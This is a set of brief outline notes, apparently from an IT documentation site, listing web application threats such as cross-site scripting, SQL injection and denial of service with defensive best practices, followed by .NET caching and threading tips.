Cross Site Scripting
Cross-site scripting allows hackers to:
1)      Execute malicious script in a client’s Web browser
2)      Embed <script>, <object>, <applet>, and <embed> tags
3)      Steal web session information
4)      Modify user’s screen
a.       Any Dynamic HTML code based on content that users submit is vulnerable

SQL Injection
1)      Users control the criteria of SQL statements
2)      Hackers enter values that alter the original intention of the SQL statement
3)      Four common examples of SQL injection:
b.      Probing databases
c.       Bypassing authorization
d.      Executing multiple SQL statements
e.       Calling built-in stored procedures

Cryptographic Hacking
1)      Hacker only needs
2)      3 of 4 cryptography components
3)      Text + CipherText + Algo > Deduce the key
4)      CipherText + Algo + Key > Deduce the Text
a.       Algorithms … Do not remain a secret for long
b.      Key … As strong as technique used to create it

COM Safe for Script Issues
1)      Is your control really Safe
2)      COM controls can be repurposed
3)      Warnings are optional

Best Practice Medicine:
1)      Implement Security as a Design Feature
2)      Do Not Store un-encrypted Secret Information
a.       Use Crypto
3)      Sign your controls with digital signatures
4)      Consider binding the control to your site
5)      Use managed code

Denial of Service Attacks
1)      Application or operating system failure
2)      CPU starvation
3)      Memory starvation
4)      Resource starvation
5)      Network starvation

Best Practice Medicine:
1)      Security as a Design Feature
2)      Do Not Trust User Input
3)      Fail Intelligently
4)      Test Security

Application Blocks
1)      Caching App. Block
2)      Offline App. Block

Cache
1)      Instead of roundtrip to server
2)      Read-only reference data
3)      Data destined for remote
4)      servers while consolidating

Caution
1)      Avoid volatile cached data
2)      Avoid sensitive cached data

General
1)      Rely on System Garbage Collectors (resourcing)
2)      Avoid custom GC logic

Use background thread for
1)      Lengthy initialization
2)      Remote service calls
3)      I/O Processing

Foreground Thread
1)      Default when using Thread()
2)      Prevent process from terminating
3)      Background Thread
4)      Thread.IsBackground()

https://www.bestitdocuments.com/Samples